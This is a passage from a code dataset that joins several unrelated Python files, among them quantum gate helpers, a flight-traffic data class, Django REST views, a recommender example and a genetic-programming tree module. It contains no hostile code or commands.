np.matmul(r1,r2)\r\n \r\n if direction == 'down':\r\n c1 = cnot(q1,q1+1,total)\r\n c2 = cnot(q1+1,q1,total)\r\n if direction == 'up':\r\n c1 = cnot(q1+1,q1,total)\r\n c2 = cnot(q1,q1+1,total)\r\n \r\n two_Q = np.matmul(c1,two_Q)\r\n \r\n two_Q = np.matmul(c2, 
two_Q)\r\n return two_Q\r\n\r\ndef rz(phi,qubit,total):\r\n rz=np.array([[1, 0],[0,e**(1j*phi)]])\r\n rz=np.kron(np.identity(2**qubit),rz)\r\n rz=np.kron(rz,np.identity(2**(total-qubit-1)))\r\n return rz \r\n \r\ndef three_Q(theta1, theta2, theta3, theta4, theta5, theta6, q1, total):\r\n r1= ry(theta1,q1,total)\r\n r2 = ry(theta2,q1+1,total)\r\n r3 = ry(theta3,q1+2,total)\r\n r = np.matmul(r1,r2)\r\n r = np.matmul(r,r3)\r\n \r\n c = cnot(q1,q1+1,total)\r\n \r\n three_Q = np.matmul(c,r)\r\n \r\n c = ry(theta4, q1+1, total)\r\n \r\n three_Q = np.matmul(c, three_Q)\r\n \r\n c = cnot(q1+1, q1+2, total)\r\n \r\n three_Q = np.matmul(c, three_Q)\r\n \r\n c = swap(q1+1, q1+2,total)\r\n \r\n three_Q = np.matmul(c, three_Q)\r\n \r\n r1 = ry(theta5,q1,total)\r\n r2 = ry(theta6,q1+1,total)\r\n r = np.matmul(r1, r2)\r\n \r\n \r\n three_Q = np.matmul(r, three_Q)\r\n \r\n c = cnot(q1,q1+1,total)\r\n \r\n three_Q = np.matmul(c,r)\r\n \r\n c = swap(q1+1,q1+2,total)\r\n \r\n three_Q = np.matmul(c, three_Q) \r\n \r\n return three_Q\r\n\r\ndef two_Q_2(theta1, theta2, q1, q2, total):\r\n \r\n \"\"\"theta 1 acts on q1 \"\"\" \r\n\r\n r1 = ry(theta1,q1,total)\r\n r2 = ry(theta2,q2,total)\r\n two_Q_2 = np.matmul(r1,r2)\r\n k = 0\r\n while abs(q1-q2)>1:\r\n\r\n two_Q_2 = np.matmul(two_Q_2,swap(q1, q1+(np.sign(q2-q1)*+1), total))\r\n \r\n q2 = q1+(np.sign(q2-q1)*+1)\r\n k = k+1\r\n \r\n c1 = cnot(q1,q2,total)\r\n \r\n two_Q_2 = np.matmul(c1, two_Q_2)\r\n\r\n for i in range(k):\r\n two_Q_2 = np.matmul(two_Q_2,swap(q1, q1-(np.sign(q2-q1)*-1), total))\r\n q2 = q1-(np.sign(q2-q1)*-1)\r\n \r\n return two_Q_2\r\n\r\n\r\n","sub_path":"my_gates.py","file_name":"my_gates.py","file_ext":"py","file_size_in_byte":3522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"338731106","text":"from . 
import inputFormatClass, keyFormatClass, valueFormatClass, conf\nimport logging\nfrom glob import glob\nimport pyspark\n\n\"\"\"\n Loading functions for region data\n\"\"\"\n# global logger\nlogger = logging.getLogger('gmql_logger')\n\n\ndef put_in_dictionary(tuple):\n tuple[1]['id_sample'] = tuple[0]\n return tuple[1]\n\n\ndef load_reg_from_path(path, parser):\n\n # we need to take only the files of the regions, so only the files that does NOT end with '.meta'\n all_files = set(glob(pathname=path + '/*'))\n meta_files = set(glob(pathname=path + '/*.meta'))\n\n only_region_files = all_files - meta_files\n only_region_files = ','.join(only_region_files)\n\n conf_meta = conf.copy()\n conf_meta[\"mapred.input.dir\"] = only_region_files\n sc = pyspark.SparkContext.getOrCreate()\n\n logger.info(\"loading region data\")\n files = sc.newAPIHadoopRDD(inputFormatClass,\n keyFormatClass,\n valueFormatClass,\n conf=conf_meta) # files = RDD(id, string)\n logger.info(\"parsing region data\")\n files = files.map(lambda x: parser.parse_line_reg(id_record=x[0], line=x[1])) # files = RDD(id, dict)\n\n return files, parser.get_attributes() # RDD[(id_sample, RegRecord)]\n","sub_path":"gmql/dataset/loaders/RegLoaderRDD.py","file_name":"RegLoaderRDD.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"503836597","text":"# fmt: off\n\nimport logging\nimport warnings\nfrom concurrent.futures import ProcessPoolExecutor, as_completed\nfrom datetime import timedelta\nfrom functools import lru_cache\nfrom pathlib import Path\nfrom typing import (TYPE_CHECKING, Any, Callable, Dict, Iterable, Iterator,\n List, Optional, Set, Tuple, Type, TypeVar, Union, overload)\n\nimport pandas as pd\nimport pyproj\nfrom cartopy import crs\nfrom cartopy.mpl.geoaxes import GeoAxesSubplot\nfrom tqdm.autonotebook import tqdm\n\nfrom ..core.time import time_or_delta, timelike, to_datetime\nfrom .flight import 
Flight\nfrom .mixins import GeographyMixin\nfrom .sv import StateVectors\n\nif TYPE_CHECKING:\n from .airspace import Airspace # noqa: F401\n from ..algorithms.cpa import CPA # noqa: F401\n\n# fmt: on\n\n# https://github.com/python/mypy/issues/2511\nTrafficTypeVar = TypeVar(\"TrafficTypeVar\", bound=\"Traffic\")\n\n\nclass Traffic(GeographyMixin):\n\n __slots__ = (\"data\",)\n\n _parse_extension: Dict[str, Callable[..., pd.DataFrame]] = dict()\n\n @classmethod\n def from_flights(cls, flights: Iterable[Optional[Flight]]) -> \"Traffic\":\n cumul = [f.data for f in flights if f is not None]\n if len(cumul) == 0:\n raise ValueError(\"empty traffic\")\n return cls(pd.concat(cumul, sort=False))\n\n @classmethod\n def from_file(\n cls: Type[TrafficTypeVar], filename: Union[Path, str], **kwargs\n ) -> Optional[TrafficTypeVar]:\n\n tentative = super().from_file(filename)\n\n if tentative is not None:\n rename_columns = {\n \"time\": \"timestamp\",\n \"lat\": \"latitude\",\n \"lon\": \"longitude\",\n # speeds\n \"velocity\": \"groundspeed\",\n \"ground_speed\": \"groundspeed\",\n \"ias\": \"IAS\",\n \"tas\": \"TAS\",\n \"mach\": \"Mach\",\n # vertical rate\n \"vertrate\": \"vertical_rate\",\n \"vertical_speed\": \"vertical_rate\",\n \"roc\": \"vertical_rate\",\n # let's just make baroaltitude the altitude by default\n \"baro_altitude\": \"altitude\",\n \"baroaltitude\": \"altitude\",\n \"geo_altitude\": \"geoaltitude\",\n }\n\n if (\n \"baroaltitude\" in tentative.data.columns\n or \"baro_altitude\" in tentative.data.columns\n ):\n # for retrocompatibility\n rename_columns[\"altitude\"] = \"geoaltitude\"\n\n return tentative.rename(columns=rename_columns)\n\n path = Path(filename)\n method = cls._parse_extension.get(\"\".join(path.suffixes), None)\n if method is None:\n logging.warn(f\"{path.suffixes} extension is not supported\")\n return None\n\n data = method(filename, **kwargs)\n if data is None:\n return None\n\n return cls(data)\n\n # --- Special methods ---\n\n def 
__add__(self, other) -> \"Traffic\":\n # useful for compatibility with sum() function\n if other == 0:\n return self\n return self.__class__(pd.concat([self.data, other.data], sort=False))\n\n def __radd__(self, other) -> \"Traffic\":\n return self + other\n\n @overload\n def __getitem__(self, index: str) -> Optional[Flight]:\n ...\n\n # TODO Iterable[str] would be more appropriate but it overlaps with str\n @overload # noqa: F811\n def __getitem__(\n self, index: Union[List[str], Set[str]]\n ) -> Optional[\"Traffic\"]:\n ...\n\n def __getitem__(self, index): # noqa: F811\n\n data = self.data # should be useless except in some cornercase\n\n if not isinstance(index, str):\n logging.debug(\"Selecting flights from a list of identifiers\")\n subset = list(index) # noqa: F841\n if \"flight_id\" in self.data.columns:\n return self.__class__(\n self.data.loc[self.data.flight_id.isin(subset)]\n )\n else:\n return self.__class__(\n self.data.loc[self.data.callsign.isin(subset)]\n )\n\n if self.flight_ids is not None:\n data = data[data.flight_id == index]\n if data.shape[0] > 0:\n return Flight(data)\n\n logging.debug(\"Fallbacking to icao24/callsign\")\n\n # if no such index as flight_id or no flight_id column\n try:\n # If the index can be interpreted as an hexa, it is most likely an\n # icao24 address. 
However some callsigns may look like an icao24.\n # Tie-breaker:\n # - if it starts by 0x, priority goes to the icao24;\n # - if it is in capital letters, priority goes to the callsign\n value16 = int(index, 16) # noqa: F841 (unused value16)\n default_icao24 = True\n if index.startswith(\"0x\"):\n index = index.lower()\n logging.debug(\"Selecting an icao24\")\n data = self.data.loc[self.data.icao24 == index[2:]]\n default_icao24 = False\n if index.isupper():\n logging.debug(\"Selecting a callsign\")\n data = self.data.loc[self.data.callsign == index]\n if data.shape[0] > 0:\n default_icao24 = False\n if default_icao24:\n index = index.lower()\n logging.debug(\"Selecting an icao24\")\n data = self.data.loc[self.data.icao24 == index]\n except ValueError:\n index = index.upper()\n logging.debug(\"Selecting a callsign\")\n data = self.data.loc[self.data.callsign == index]\n\n if data.shape[0] > 0:\n return Flight(data)\n\n return None\n\n def _ipython_key_completions_(self) -> Set[str]:\n if self.flight_ids is not None:\n return self.flight_ids\n return {*self.aircraft, *self.callsigns}\n\n def __iter__(self) -> Iterator[Flight]:\n if self.flight_ids is not None:\n for _, df in self.data.groupby(\"flight_id\"):\n yield Flight(df)\n else:\n for _, df in self.data.groupby([\"icao24\", \"callsign\"]):\n yield from Flight(df).split(\"10 minutes\")\n\n def __len__(self):\n return sum(1 for _ in self)\n\n def __repr__(self) -> str:\n stats = self.stats()\n shape = stats.shape[0]\n if shape > 10:\n # stylers are not efficient on big dataframes...\n stats = stats.head(10)\n return stats.__repr__()\n\n def _repr_html_(self) -> str:\n stats = self.stats()\n shape = stats.shape[0]\n if shape > 10:\n # stylers are not efficient on big dataframes...\n stats = stats.head(10)\n styler = stats.style.bar(align=\"mid\", color=\"#5fba7d\")\n rep = f\"Traffic with {shape} identifiers\"\n return rep + styler._repr_html_()\n\n def filter_if(self, criterion: Callable[[Flight], bool]) -> 
\"Traffic\":\n return Traffic.from_flights(\n flight for flight in self if criterion(flight)\n )\n\n def subset(self, callsigns: Iterable[str]) -> \"Traffic\":\n warnings.warn(\"Use filter_if instead\", DeprecationWarning)\n if \"flight_id\" in self.data.columns:\n return Traffic.from_flights(\n flight\n for flight in self\n # should not be necessary but for type consistency\n if flight.flight_id is not None\n and flight.flight_id in callsigns\n )\n else:\n return Traffic.from_flights(\n flight\n for flight in self\n if flight.callsign in callsigns # type: ignore\n )\n\n # --- Properties ---\n\n # https://github.com/python/mypy/issues/1362\n @property # type: ignore\n @lru_cache()\n def start_time(self) -> pd.Timestamp:\n return self.data.timestamp.min()\n\n # https://github.com/python/mypy/issues/1362\n @property # type: ignore\n @lru_cache()\n def end_time(self) -> pd.Timestamp:\n return self.data.timestamp.max()\n\n # https://github.com/python/mypy/issues/1362\n @property # type: ignore\n @lru_cache()\n def callsigns(self) -> Set[str]:\n \"\"\"Return only the most relevant callsigns\"\"\"\n sub = self.data.query(\"callsign == callsign\")\n return set(cs for cs in sub.callsign if len(cs) > 3 and \" \" not in cs)\n\n @property\n def aircraft(self) -> Set[str]:\n return set(self.data.icao24)\n\n @property\n def flight_ids(self) -> Optional[Set[str]]:\n if \"flight_id\" in self.data.columns:\n return set(self.data.flight_id)\n return None\n\n # --- Easy work ---\n\n def at(self, time: Optional[timelike] = None) -> \"StateVectors\":\n if time is not None:\n time = to_datetime(time)\n list_flights = [\n flight.at(time)\n for flight in self\n if flight.start <= time <= flight.stop # type: ignore\n ]\n else:\n list_flights = [flight.at() for flight in self]\n return StateVectors(\n pd.DataFrame.from_records(\n [s for s in list_flights if s is not None]\n ).assign(\n # attribute 'name' refers to the index, i.e. 
'timestamp'\n timestamp=[s.name for s in list_flights if s is not None]\n )\n )\n\n def before(self, ts: timelike) -> \"Traffic\":\n return self.between(self.start_time, ts)\n\n def after(self, ts: timelike) -> \"Traffic\":\n return self.between(ts, self.end_time)\n\n def between(self, before: timelike, after: time_or_delta) -> \"Traffic\":\n before = to_datetime(before)\n if isinstance(after, timedelta):\n after = before + after\n else:\n after = to_datetime(after)\n\n # full call is necessary to keep @before and @after as local variables\n # return self.query('@before < timestamp < @after') => not valid\n return self.__class__(self.data.query(\"@before < timestamp < @after\"))\n\n def airborne(self) -> \"Traffic\":\n \"\"\"Returns the airborne part of the Traffic.\n\n The airborne part is determined by null values on the altitude column.\n \"\"\"\n return self.query(\"altitude == altitude\")\n\n @lru_cache()\n def stats(self) -> pd.DataFrame:\n \"\"\"Statistics about flights contained in the structure.\n Useful for a meaningful representation.\n \"\"\"\n key = [\"icao24\", \"callsign\"] if self.flight_ids is None else \"flight_id\"\n return (\n self.data.groupby(key)[[\"timestamp\"]]\n .count()\n .sort_values(\"timestamp\", ascending=False)\n .rename(columns={\"timestamp\": \"count\"})\n )\n\n def assign_id(self) -> \"Traffic\":\n if \"flight_id\" in self.data.columns:\n return self\n return Traffic.from_flights(\n flight.assign(flight_id=f\"{flight.callsign}_{id_:>03}\")\n for id_, flight in enumerate(self)\n )\n\n def filter(\n self,\n strategy: Callable[\n [pd.DataFrame], pd.DataFrame\n ] = lambda x: x.bfill().ffill(),\n **kwargs,\n ) -> \"Traffic\":\n return Traffic.from_flights(\n flight.filter(strategy, **kwargs) for flight in self\n )\n\n def plot(\n self, ax: GeoAxesSubplot, nb_flights: Optional[int] = None, **kwargs\n ) -> None:\n params: Dict[str, Any] = {}\n if sum(1 for _ in zip(range(8), self)) == 8:\n params[\"color\"] = \"#aaaaaa\"\n 
params[\"linewidth\"] = 1\n params[\"alpha\"] = 0.8\n kwargs = {**params, **kwargs} # precedence of kwargs over params\n for i, flight in enumerate(self):\n if nb_flights is None or i < nb_flights:\n flight.plot(ax, **kwargs)\n\n @property\n def widget(self):\n from ..drawing.ipywidgets import TrafficWidget\n\n return TrafficWidget(self)\n\n def inside_bbox(\n self, bounds: Union[\"Airspace\", Tuple[float, ...]]\n ) -> \"Traffic\":\n # implemented and monkey-patched in airspace.py\n # given here for consistency in types\n raise NotImplementedError\n\n def intersects(self, airspace: \"Airspace\") -> \"Traffic\":\n # implemented and monkey-patched in airspace.py\n # given here for consistency in types\n raise NotImplementedError\n\n # --- Real work ---\n\n def resample(\n self,\n rule: Union[str, int] = \"1s\",\n max_workers: int = 4,\n ) -> \"Traffic\":\n \"\"\"Resamples all trajectories, flight by flight.\n\n `rule` defines the desired sample rate (default: 1s)\n \"\"\"\n\n with ProcessPoolExecutor(max_workers=max_workers) as executor:\n cumul = []\n tasks = {\n executor.submit(flight.resample, rule): flight\n for flight in self\n }\n for future in tqdm(as_completed(tasks), total=len(tasks)):\n cumul.append(future.result())\n\n return self.__class__.from_flights(cumul)\n\n def closest_point_of_approach(\n self,\n lateral_separation: float,\n vertical_separation: float,\n projection: Union[pyproj.Proj, crs.Projection, None] = None,\n round_t: str = \"d\",\n max_workers: int = 4,\n ) -> \"CPA\":\n \"\"\"\n Computes a CPA dataframe for all pairs of trajectories candidates for\n being separated by less than lateral_separation in vertical_separation.\n\n In order to be computed efficiently, the method needs the following\n parameters:\n\n - projection: a first filtering is applied on the bounding boxes of\n trajectories, expressed in meters. 
You need to provide a decent\n projection able to approximate distances by Euclide formula.\n By default, EuroPP() projection is considered, but a non explicit\n argument will raise a warning.\n\n - round_t: an additional column will be added in the DataFrame to group\n trajectories by relevant time frames. Distance computations will be\n considered only between trajectories flown in the same time frame.\n By default, the 'd' pandas freq parameter is considered, to group\n trajectories by day, but other ways of splitting ('h') may be more\n relevant and impact performance.\n\n - max_workers: distance computations are spread over a given number of\n processors.\n\n \"\"\"\n\n from ..algorithms.cpa import closest_point_of_approach\n\n return closest_point_of_approach(\n self,\n lateral_separation,\n vertical_separation,\n projection,\n round_t,\n max_workers,\n )\n","sub_path":"traffic/core/traffic.py","file_name":"traffic.py","file_ext":"py","file_size_in_byte":14832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"185247984","text":"ai = [1, 2, 3]\nbi = [11.5, 14, 15.5]\n\nn = len(ai)\n\nc1 = n\nc2 = 0\nc3 = 0\nc4 = 0\nc5 = 0\n\n# Calcul des constantes\nfor a, b in zip(ai, bi):\n\tc2 += b ** 2\n\tc3 += 2 * a * b\n\tc4 += 2 * b\n\tc5 += 2 * a\n\n# Recherche du minimum (le seul point critique)\nd = 4 * c1 * c2 - c4 ** 2\ns = (2 * c1 * c3 - c4 * c5) / d\nt = -(c3 * c4 - 2 * c2 * c5) / d\n\nprint(s, t)\n\nfor a, b in zip(ai, bi):\n\tnb = b * s + t\n\tprint(a, nb, abs(a - nb))\n","sub_path":"test/align.py","file_name":"align.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"548991079","text":"# Copyright 2018 The Cornac Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"Example for Visual Matrix Factorization (VMF)\"\"\"\n\nimport cornac\nfrom cornac.datasets import amazon_clothing\nfrom cornac.data import ImageModality\nfrom cornac.eval_methods import RatioSplit\n\n\n# The necessary data can be loaded as follows\nfeedback = amazon_clothing.load_feedback()\nfeatures, item_ids = amazon_clothing.load_visual_feature()\n\n# Instantiate a ImageModality, it makes it convenient to work with visual auxiliary information\n# For more details, please refer to the tutorial on how to work with auxiliary data\nitem_image_modality = ImageModality(features=features, ids=item_ids, normalized=True)\n\n# Define an evaluation method to split feedback into train and test sets\nratio_split = RatioSplit(\n data=feedback,\n test_size=0.1,\n rating_threshold=0.5,\n exclude_unknowns=True,\n verbose=True,\n item_image=item_image_modality,\n)\n\n# Instantiate VMF\nvmf = cornac.models.VMF(\n k=10,\n d=10,\n n_epochs=100,\n batch_size=100,\n learning_rate=0.001,\n gamma=0.9,\n lambda_u=0.001,\n lambda_v=0.001,\n lambda_p=1.0,\n lambda_e=10.0,\n use_gpu=True,\n verbose=True,\n)\n\n# Instantiate evaluation measures\nrec_100 = cornac.metrics.Recall(k=100)\n\n# Put everything together into an experiment and run it\ncornac.Experiment(eval_method=ratio_split, models=[vmf], 
metrics=[rec_100]).run()\n","sub_path":"examples/vmf_clothing.py","file_name":"vmf_clothing.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"207984479","text":"#!/usr/bin/env python\n\nfrom itertools import groupby\nfrom operator import itemgetter\nimport sys,pickle\nfrom math import log10\n# from assignment4.reformatter import PageNode\nidf = lambda q_df, doc_num: log10(doc_num/q_df)\nresult = {}\ndata = map(lambda x: x.strip().split('\\t'), sys.stdin)\n\ndata = sorted(data,key= itemgetter(0))\npage_num = 0\nfor term, id in data:\n\tpage_num+=1\nfor k_group, group in groupby(data, itemgetter(0) ): #group by term (doc_id, (word, TITLE_WORD_SCORE))\n\t# total = sum(int(id) for term,id in group)\n\t# print(\"%s\" % (k_group))\n\t# result[k_group] = len( list(group) )\n\tresult[k_group] = idf( len( list(group) ), page_num) \npickle.dump(result , sys.stdout.buffer) \n","sub_path":"assignment4/mr_apps/idf_reducer.py","file_name":"idf_reducer.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"69847634","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 2 21:53:48 2020\n\n@author: adven\n\"\"\"\n\nfrom PIL import Image, ImageOps\nfrom IPython.display import display\nimport numpy as np\n\ndef digitize(array):\n array = array.copy()\n for i in range(len(array)):\n for j in range(len(array[i])):\n color = array[i,j]\n \n if color <= 122:\n array[i,j] = 255\n \n else:\n array[i,j] = 0\n return array\n \n \npath = \"C:\\\\Users\\\\adven\\\\Desktop\\\\Crit. 
Data\\\\cdv-student\\projects\\placeholder\\Datazine\\datazine-template\\\\assets\\Middle.jpg\"\nimg = Image.open(path)\nimg = img.copy()\ngray_img = ImageOps.grayscale(img)\n\nimg_data = np.asarray(gray_img)\ndigitized = np.asarray(digitize(img_data))\nunique_elements, counts_elements = np.unique(digitized, return_counts=True)\nnew_img = Image.fromarray(digitized)\nnew_img.show()\n\n\n","sub_path":"projects/placeholder/Datazine/datazine-template/scripts/lineDrawingDigitizer.py","file_name":"lineDrawingDigitizer.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"16663335","text":"from django.urls import path\nfrom . import views\n\napp_name = 'blog'\n\nurlpatterns = [\n path('', views.PostListView.as_view(), name= 'all_posts'),\n path('/', views.PostDetailView.as_view(), name='single_post'),\n path('create/', views.PostCreateView.as_view(), name='create_post'),\n path('edite//', views.PostEditeView.as_view(), name='edite_post'),\n path('delete//', views.PostDeleteView.as_view(), name='delete_post'),\n path('comment//', views.add_comment_to_post, name='comment_to_post'),\n]\n","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"25903499","text":"import os\n\nfrom metasdk import MetaApp\n\nMETA = MetaApp()\nlog = META.log\n\nos.chdir(os.path.dirname(__file__))\n__DIR__ = os.getcwd() + \"/\"\n\nq = \"\"\"\nSELECT\n channel_name,\n ROUND( COALESCE(SUM(pageviews) / NULLIF(SUM(sessions), 0), 0) , 2) as pv\nFROM adplatform.campaign_avg_depth_stats_report\nWHERE stat_date BETWEEN '2017-08-01' AND '2017-08-31'\nAND system = 'googleAnalytics'\nand client_id=1460\nGROUP BY channel_name\nORDER BY channel_name\n\"\"\"\n\nconfiguration = {\n \"download\": {\n # \"skipHeaders\": True,\n \"dbQuery\": {\n \"command\": q\n }\n 
}\n}\nMETA.auth_user_id = 10191\nmetaql = META.MetaqlService\nresp = metaql.download_data(configuration, output_file=__DIR__ + 'assets/campaign_sessions_stats_report.tsv')\nlog.info(\"end\")\n","sub_path":"metasdk/examples/metaql/metaql_get_adplatform_campaign_session_stat.py","file_name":"metaql_get_adplatform_campaign_session_stat.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"109953106","text":"\"\"\"\n@Auth:tiannana\n\"\"\"\nimport re\n\nfrom common.apollo import services\nfrom utils.tools.base_test_case import BaseTestCase\nfrom api.http_client_bck import HttpClientBck\nfrom utils.common import get_mysql\nfrom utils.log import LOGGER\n\n\nclass TestBckSpellingList(BaseTestCase):\n\n @classmethod\n def setup_class(cls):\n cls.bck = HttpClientBck()\n cls.mysql = get_mysql()\n cls.setup_data = getattr(cls, \"setup_data\")\n\n @classmethod\n def teardown_class(cls):\n LOGGER.info(\"TestBckSpellingList测试结束\")\n pass\n\n def test_spelling_list(self, data):\n \"\"\"\n desc:获取登录用户spelling体验课列表信息\n step1:请求接口拿到返回信息\n step2:查询数据库\n step3:断言1.2\n \"\"\"\n\n user_id = re.search(\"=(.*?)&\", services.m_token[\"Cookie\"]).group(1)\n print(user_id)\n\n list1 = self.bck.spelling_list(data.pageNum, data.pageSize, data.productId)\n print(list1)\n list_info = self.mysql.query(\"SELECT * FROM xmkp_edu.EDU_CLASSMATE WHERE user_id=344746 AND is_deleted=0\", True)\n print(list_info)\n print(list1.data.courses[0].productRef)\n print(list_info[0].product_ref)\n\n self.assert_equal(list1.data.courses[0].productRef, list_info[0].product_ref,\"product_ref\")\n\n\n\n\n\n","sub_path":"auto_api_project/xmkp-api-test/cases/BCK/test_cases/test_bck_spellinglist.py","file_name":"test_bck_spellinglist.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"595732132","text":"#!/usr/bin/env 
python\n\nimport sys\nimport subprocess\n\n\ndef main():\n\n _path = sys.argv[1]\n\n subprocess.check_call(['./runme.py', \\\n _path + '3dMap', _path + 'imagery', \\\n _path + 'camera.config', _path + 'GPS.csv', \\\n _path + 'ImageryTimestamp.csv', 'output.csv'])\n\nif __name__ == '__main__':\n main()\n","sub_path":"exec.py","file_name":"exec.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"74025264","text":"# -*- coding:utf8 -*-\n\"\"\"\nCreated on 15-12-26 下午4:37\n@author: FMC\n\n\"\"\"\nfrom __future__ import nested_scopes, generators, division, absolute_import, with_statement, print_function\n\nfrom django.views.generic.base import View\nfrom django.views.generic.edit import BaseFormView\nfrom django.http.response import JsonResponse, HttpResponseRedirect\nfrom django.core.exceptions import ImproperlyConfigured\n\nfrom .base import CommonBaseExtMixin\nfrom .edit import CommonExtFormMixin, DeletionMixin\n\n\nclass RestFulResponseMixin(object):\n \"\"\"\n A mixin that can be response json data\n \"\"\"\n response_class = JsonResponse\n\n def render_to_response(self, context, **response_kwargs):\n return self.response_class(context, **response_kwargs)\n\n\nclass CommonRestFulModelFormMixin(CommonExtFormMixin):\n \"\"\"\n 对ModelFormMixin类的扩展,使其更为通用,并支持Ajax\n \"\"\"\n def form_invalid(self, form):\n context = self.ajax_form_invalid(form)\n return JsonResponse(context)\n\n def form_valid(self, form):\n # We make sure to call the parent's form_valid() method because\n # it might do some processing (in the case of CreateView, it will\n # call form.save() for example).\n self.object = self.form_save(form)\n self.object.__dict__.pop('_state')\n context_data = {\n 'model': self.object._meta.__str__(),\n 'pk': self.object.pk,\n 'fields': self.object.__dict__\n }\n context = self.get_response_data(context_data)\n context['pk'] = self.object.pk\n return 
JsonResponse(context)\n\n\nclass RestFulDeletionMixin(DeletionMixin):\n \"\"\"\n 支持Ajax的删除mixin\n \"\"\"\n def delete(self, request, *args, **kwargs):\n \"\"\"\n 当请求是ajax时,返回json格式的数据\n \"\"\"\n response = super(RestFulDeletionMixin, self).delete(request, *args, **kwargs)\n if request.is_ajax():\n return JsonResponse({})\n else:\n return response\n\n\nclass MultipleObjectDeletionMixin(DeletionMixin):\n \"\"\"\n 支持多对象删除操作\n \"\"\"\n status = {\n 'result': True,\n 'comment': '',\n 'data': {}\n }\n\n def delete(self, request, *args, **kwargs):\n \"\"\"\n 调用delete(),可批量删除多个对象,并重定向至success_url\n \"\"\"\n\n self.object_list = self.get_queryset()\n success_url = self.get_success_url()\n\n comment = self.get_result_comment()\n\n try:\n self.object_list.delete()\n except:\n self.status['result'] = False\n self.status['comment'] = comment['failure']\n else:\n self.status['result'] = True\n self.status['comment'] = comment['success']\n\n if self.request.is_ajax():\n return JsonResponse(self.status)\n else:\n return HttpResponseRedirect(success_url)\n\n def get_success_url(self):\n if self.success_url:\n return self.success_url\n else:\n raise ImproperlyConfigured(\n \"No URL to redirect to. 
Provide a success_url.\")\n\n\nclass CommonRestFulView(CommonBaseExtMixin, RestFulResponseMixin, View):\n \"\"\"\n 通用restful api视图\n \"\"\"\n\n\nclass CommonFormRestFulView(CommonExtFormMixin, RestFulResponseMixin, BaseFormView):\n \"\"\"\n 通用restful api视图\n \"\"\"\n\n","sub_path":"omni/libs/django/view/restful_api.py","file_name":"restful_api.py","file_ext":"py","file_size_in_byte":3394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"531233242","text":"#!/usr/bin/python3\n\"\"\"This module contains all of the classes and functions required for a\nbasic symbolic-regression implementation of genetic programming, including\nclasses binary trees and nodes to fill them, recombination and mutation\noperations, and basic data-handling functionality.\n\"\"\"\n\n\nfrom random import sample, random, randint, choice\nfrom pyGP.primitives import pi, e\nfrom math import log2\nfrom copy import deepcopy\n\n\nclass Node(object):\n \"\"\"\"\"\"\n def __init__(self, value, arity):\n if value == \"rand\":\n self.value = str(random()) \n else:\n self.value = value\n\n self.arity = arity\n\n\nclass LinearTree(list):\n def __init__(self):\n pass\n\n\nclass BinaryTree(list):\n \"\"\"\"\"\"\n def __init__(self, primitives, set_dict, contents, depth=None):\n self.primitives = primitives\n self.set_dict = set_dict\n values_provided = (type(contents) == list)\n if values_provided:\n self.size = len(contents)\n self.depth = get_depth(self.size)\n else:\n self.depth = depth\n self.size = 2 ** (self.depth + 1) - 1\n\n self.extend([None]*self.size)\n self.last_level = 2 ** self.depth - 1\n if values_provided:\n for i in range(len(contents)):\n if contents[i] != None:\n self[i] = Node(contents[i], primitives[contents[i]])\n elif contents == 'full':\n self._full(self.size, self.last_level, 0)\n elif contents == 'grow':\n self._grow(self.size, self.last_level, 0)\n\n def get_left_index(self, n):\n return 2 * n + 1\n\n def 
get_right_index(self, n):\n return 2 * n + 2\n\n def get_parent_index(self, n):\n return int( (n - 1) / 2)\n\n def has_children(self, n):\n if (2 * n + 1) >= len(self) or (self[self.get_left_index(n)] == None\n and self[self.get_right_index(n)]\n == None):\n return False\n else:\n return True\n\n def get_left_child(self, n):\n if self.has_children(n):\n i = self.get_left_index(n)\n return self[i]\n else:\n return None\n\n def get_right_child(self, n):\n if self.has_children(n):\n i = self.get_right_index(n)\n return self[i]\n else:\n return None\n\n def get_parent(self, n):\n return self[self.get_parent_index(n)]\n\n def _full(self, s, m, n):\n \"\"\"Populates the tree using the full method\"\"\"\n if (n < m):\n self[n] = Node(choice(self.set_dict[\"functions\"]), 2)\n self._full(s, m, 2*n+1)\n self._full(s, m, 2*n+2)\n elif (n < s):\n self[n] = Node(choice(self.set_dict[\"terminals\"]), 0)\n\n def _grow(self, s, m, n):\n \"\"\"Populates the tree using the grow method\"\"\"\n\n # somewhere in here is the problem- need to assign a terminal node to 0 if\n # tree has length 1\n\n parent = self.get_parent(n) # this needs to change as well\n if n == 0: #and self.depth >= 1: switch order, do if equal zero and else\n 